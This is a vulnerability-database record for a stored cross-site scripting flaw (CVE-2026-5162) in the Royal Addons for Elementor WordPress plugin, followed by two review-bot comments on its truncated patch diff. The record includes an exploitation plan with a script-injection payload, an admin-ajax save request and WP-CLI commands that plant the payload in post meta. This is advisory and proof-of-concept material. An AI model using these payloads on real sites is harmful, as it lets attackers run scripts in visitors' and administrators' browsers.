[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f4_AzByuLN07DmLMUYTWS9-mak3yI-l4PiHPvZB_8ddE":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":9,"research_fix_diff":35,"research_exploit_outline":36,"research_model_used":37,"research_started_at":38,"research_completed_at":39,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":40},"CVE-2026-5162","royal-addons-for-elementor-authenticated-contributor-stored-cross-site-scripting-via-instagram-feed-widget","Royal Addons for Elementor \u003C= 1.7.1056 - Authenticated (Contributor+) Stored Cross-Site Scripting via Instagram Feed Widget","The Royal Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Instagram Feed widget's 'instagram_follow_text' setting in all versions up to, and including, 1.7.1056 due to insufficient input sanitization and output escaping. 
This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","royal-elementor-addons",null,"\u003C=1.7.1056","1.7.1057","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-16 13:10:11","2026-04-17 01:24:36",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F16d083bc-d726-4291-bc6d-a7bf83fa78c3?source=api-prod",1,[22,23,24,25,26,27,28,29],"admin\u002Fplugin-options.php","admin\u002Ftemplates\u002Flibrary\u002Fwpr-templates-data.php","assets\u002Fcss\u002Fadmin\u002Feditor.min.css","assets\u002Fcss\u002Ffrontend.css","assets\u002Fcss\u002Ffrontend.min.css","assets\u002Fjs\u002Fadmin\u002Feditor.js","assets\u002Fjs\u002Fadmin\u002Feditor.min.js","assets\u002Fjs\u002Ffrontend.js","researched",false,3,"# Exploitation Research Plan - CVE-2026-5162\n\n## 1. Vulnerability Summary\nThe **Royal Addons for Elementor** plugin (up to v1.7.1056) contains a Stored Cross-Site Scripting (XSS) vulnerability in its **Instagram Feed** widget. The vulnerability exists because the plugin fails to sanitize or escape the `instagram_follow_text` setting before rendering it on the frontend. Authenticated users with **Contributor-level** permissions or higher can create or edit a post, add the Instagram Feed widget, and inject malicious scripts into the \"Follow Text\" field. When any user views the affected post, the script executes in their browser context.\n\n## 2. 
Attack Vector Analysis\n*   **Vulnerable Widget:** `wpr-instagram-feed` (as registered in `assets\u002Fjs\u002Ffrontend.js`).\n*   **Vulnerable Setting:** `instagram_follow_text`.\n*   **Authentication Level:** Contributor+ (Users who can access the Elementor editor for posts).\n*   **Entry Point:** Elementor Editor AJAX API (`elementor_ajax`).\n*   **Target Page:** Any post or page where the malicious Instagram Feed widget is embedded.\n\n## 3. Code Flow\n1.  **Input:** A Contributor-level user edits a post using the Elementor editor. They drag the \"Instagram Feed\" widget onto the page.\n2.  **Storage:** In the widget settings, the user enters a payload (e.g., `\u003Cscript>alert(document.domain)\u003C\u002Fscript>`) into the \"Follow Text\" field (`instagram_follow_text`).\n3.  **Persistence:** When the user saves the page, Elementor sends a `POST` request to `admin-ajax.php` with the action `elementor_ajax`. The widget configuration, including the malicious setting, is stored in the WordPress database under the `_elementor_data` meta key for that post.\n4.  **Render (Sink):** When the post is viewed on the frontend, the `WprAddons\\Widgets\\Wpr_Instagram_Feed::render()` method (inferred class name) retrieves the settings from post meta. The `instagram_follow_text` value is echoed directly into the HTML (likely within a button or link) without passing through `esc_html()` or `wp_kses()`.\n\n## 4. Nonce Acquisition Strategy\nElementor uses its own AJAX infrastructure for saving post data. To successfully save a widget configuration via HTTP, a valid Elementor AJAX nonce is required.\n\n1.  **Pre-requisite:** Create a post as a Contributor and ensure it is \"Edited with Elementor\".\n2.  **Step:** Navigate to the Elementor Editor for that post: `\u002Fwp-admin\u002Fpost.php?post=[POST_ID]&action=elementor`.\n3.  **Extraction:** Use the `browser_eval` tool to extract the nonce and the post ID from the Elementor configuration object.\n4.  
**JavaScript Variable:** \n    *   Nonce: `window.elementorCommonConfig.ajax.nonce`\n    *   Editor Post ID: `window.elementorConfig.post_id` (this confirms the ID context).\n\n## 5. Exploitation Strategy\nThe exploit will simulate the Elementor \"Save\" action to inject the payload.\n\n### Step 1: Setup Content\nCreate a post and prepare it for Elementor.\n```bash\nwp post create --post_type=post --post_title=\"XSS Test\" --post_status=publish --post_author=contributor_user_id\nwp post meta add [POST_ID] _elementor_edit_mode \"builder\"\nwp post meta add [POST_ID] _elementor_template_type \"wp-post\"\n```\n\n### Step 2: Extract Nonce\nUse `browser_navigate` to the editor URL, then `browser_eval` to get the nonce.\n\n### Step 3: Inject Payload via HTTP Request\nSend a `POST` request to `admin-ajax.php` mimicking an Elementor save action.\n\n*   **URL:** `https:\u002F\u002F[TARGET]\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Method:** `POST`\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Parameters:**\n    *   `action`: `elementor_ajax`\n    *   `_nonce`: `[EXTRACTED_NONCE]`\n    *   `actions`: A JSON string containing the `save_builder` operation.\n    *   `editor_post_id`: `[POST_ID]`\n\n**Payload Structure (Actions JSON):**\n```json\n{\n  \"save_builder\": {\n    \"action\": \"save_builder\",\n    \"data\": {\n      \"status\": \"publish\",\n      \"elements\": [\n        {\n          \"id\": \"random_id_123\",\n          \"elType\": \"widget\",\n          \"widgetType\": \"wpr-instagram-feed\",\n          \"settings\": {\n            \"instagram_follow_text\": \"\\\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>\"\n          }\n        }\n      ]\n    }\n  }\n}\n```\n\n### Step 4: Trigger Execution\nNavigate to the frontend URL of the post (`\u002F?p=[POST_ID]`) to see the script execute.\n\n## 6. Test Data Setup\n1.  **Plugin Status:** `royal-elementor-addons` and `elementor` must be active.\n2.  
**User Role:** A user with the `contributor` role.\n3.  **Target Post:** A post ID where the contributor has edit permissions.\n\n## 7. Expected Results\n*   The `elementor_ajax` request should return a `200 OK` with a JSON response: `{\"success\":true,\"data\":{\"responses\":{\"save_builder\":{\"success\":true...}}}}`.\n*   The post meta `_elementor_data` for the post will contain the string `\\\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>`.\n*   Viewing the post frontend will result in an alert box showing the document domain.\n\n## 8. Verification Steps\n1.  **Database Check:**\n    ```bash\n    wp post meta get [POST_ID] _elementor_data\n    ```\n    Confirm the JSON contains the `instagram_follow_text` with the payload.\n2.  **HTML Source Check:**\n    Navigate to the post and check for the unescaped payload in the rendered HTML:\n    ```bash\n    # (Simulated via browser\u002FPlaywright)\n    # Search for: \u003Cscript>alert(document.domain)\u003C\u002Fscript>\n    ```\n\n## 9. Alternative Approaches\nIf the `elementor_ajax` save structure is too complex to replicate via a single `http_request`, the fallback is to use **WP-CLI** to directly inject the configuration into the post meta. This is effective for PoC environments where the goal is to prove the **Stored XSS** exists during rendering:\n\n```bash\n# Prepare the JSON structure\nPAYLOAD='[{\"id\":\"exploit\",\"elType\":\"widget\",\"widgetType\":\"wpr-instagram-feed\",\"settings\":{\"instagram_follow_text\":\"\\\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>\"}}]'\n\n# Update the meta directly\nwp post meta update [POST_ID] _elementor_data \"$PAYLOAD\"\n```\nThis confirms that if a Contributor saves this data (which Elementor allows), the frontend will execute it.","The Royal Addons for Elementor plugin (up to version 1.7.1056) is vulnerable to Stored Cross-Site Scripting because the Instagram Feed widget fails to sanitize and escape the 'instagram_follow_text' setting. 
This allows authenticated users with Contributor-level access or higher to inject arbitrary scripts into posts that execute in the context of any user viewing the page.","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Froyal-elementor-addons\u002F1.7.1056\u002Fadmin\u002Fplugin-options.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Froyal-elementor-addons\u002F1.7.1057\u002Fadmin\u002Fplugin-options.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Froyal-elementor-addons\u002F1.7.1056\u002Fadmin\u002Fplugin-options.php\t2026-04-03 11:57:32.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Froyal-elementor-addons\u002F1.7.1057\u002Fadmin\u002Fplugin-options.php\t2026-04-10 10:58:42.000000000 +0000\n@@ -120,6 +120,8 @@\n     register_setting('wpr-extension-settings', 'wpr-parallax-multi-layer');\n     register_setting('wpr-extension-settings', 'wpr-custom-css');\n     register_setting('wpr-extension-settings', 'wpr-display-conditions');\n+    register_setting('wpr-extension-settings', 'wpr-equal-height');\n+    \u002F\u002F register_setting('wpr-extension-settings', 'wpr-column-slider');\n     register_setting('wpr-extension-settings', 'wpr-sticky-section');\n \n     \u002F\u002F Element Toggle\n@@ -1630,6 +1632,12 @@\n                         echo '\u003Cbr>\u003Cspan>Tip: Edit any Section > Navigate to Advanced tab\u003C\u002Fspan>';\n                     } elseif ( 'wpr-display-conditions' === $option_name ) {\n                         echo '\u003Cbr>\u003Cspan>Tip: Edit any Element > Navigate to Visibility tab\u003C\u002Fspan>';\n+                    } elseif ( 'wpr-column-slider' === $option_name ) {\n+                        echo '\u003Cbr>\u003Cspan>Tip: Edit any Section > Navigate to Advanced tab\u003C\u002Fspan>';\n+                        \u002F\u002F echo '\u003Ca 
href=\"https:\u002F\u002Fwww.youtube.com\" target=\"_blank\">Watch Video Tutorial\u003C\u002Fa>';\n+                    } elseif ( 'wpr-equal-height' === $option_name ) {\n+                        echo '\u003Cbr>\u003Cspan>Tip: Edit any Section > Navigate to Advanced tab\u003C\u002Fspan>';\n+                        \u002F\u002F echo '\u003Ca href=\"https:\u002F\u002Fwww.youtube.com\" target=\"_blank\">Watch Video Tutorial\u003C\u002Fa>';\n                     }\n \n                     \u002F\u002F echo '\u003Ca href=\"https:\u002F\u002Froyal-elementor-addons.com\u002Felementor-particle-effects\u002F?ref=rea-plugin-backend-extentions-prev\">'. esc_html('View Extension Demo', 'wpr-addons') .'\u003C\u002Fa>';\n... (truncated)","To exploit this vulnerability, an attacker with Contributor-level access or higher performs the following steps:\n1. Authenticate to the WordPress site and open the Elementor editor for a post or page they have permissions to edit.\n2. Extract the required security nonce from the global JavaScript object `window.elementorCommonConfig.ajax.nonce`.\n3. Send a POST request to the `\u002Fwp-admin\u002Fadmin-ajax.php` endpoint with the action `elementor_ajax`.\n4. Craft the payload using the `save_builder` operation within the `actions` parameter. The payload must include a widget of type `wpr-instagram-feed` with the `instagram_follow_text` setting containing a malicious script (e.g., `\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>`).\n5. 
Once the page is saved with the malicious widget configuration, any user (including administrators) who navigates to the frontend of that page will trigger the execution of the injected script in their browser context.","gemini-3-flash-preview","2026-04-20 20:32:53","2026-04-20 20:33:20",{"type":41,"vulnerable_version":42,"fixed_version":11,"vulnerable_browse":43,"vulnerable_zip":44,"fixed_browse":45,"fixed_zip":46,"all_tags":47},"plugin","1.7.1056","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Froyal-elementor-addons\u002Ftags\u002F1.7.1056","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Froyal-elementor-addons.1.7.1056.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Froyal-elementor-addons\u002Ftags\u002F1.7.1057","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Froyal-elementor-addons.1.7.1057.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Froyal-elementor-addons\u002Ftags"]
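Review bot: the commented-out `// register_setting('wpr-extension-settings', 'wpr-column-slider');` line added in the `@@ -120,6 +120,8 @@` hunk of admin/plugin-options.php is dead code committed in a disabled state; either register the setting or drop the line. This hunk only registers `wpr-equal-height` and does not touch the Instagram Feed widget or the `instagram_follow_text` setting named in the advisory, so it is not the fix for CVE-2026-5162.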
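Review bot: the new `elseif ( 'wpr-column-slider' === $option_name )` branch in the `@@ -1630,6 +1632,12 @@` hunk renders a tip for a setting whose `register_setting` call is commented out in the earlier hunk, so as committed the branch appears to have no live setting to describe; keep the two in sync, and drop the two commented-out `// echo '<a href="https://www.youtube.com" ...'` placeholders rather than shipping them. For this advisory the more important point is that neither visible hunk escapes `instagram_follow_text` on output: both only echo fixed strings and register options. The diff is truncated and the listed changed files are admin/plugin-options.php, admin/templates/library/wpr-templates-data.php and CSS/JS assets, so anyone confirming that 1.7.1057 resolves CVE-2026-5162 should inspect the truncated remainder (assets/js/frontend.js is in the list) for an escaping change on the follow text rather than relying on the patched_in_version field alone.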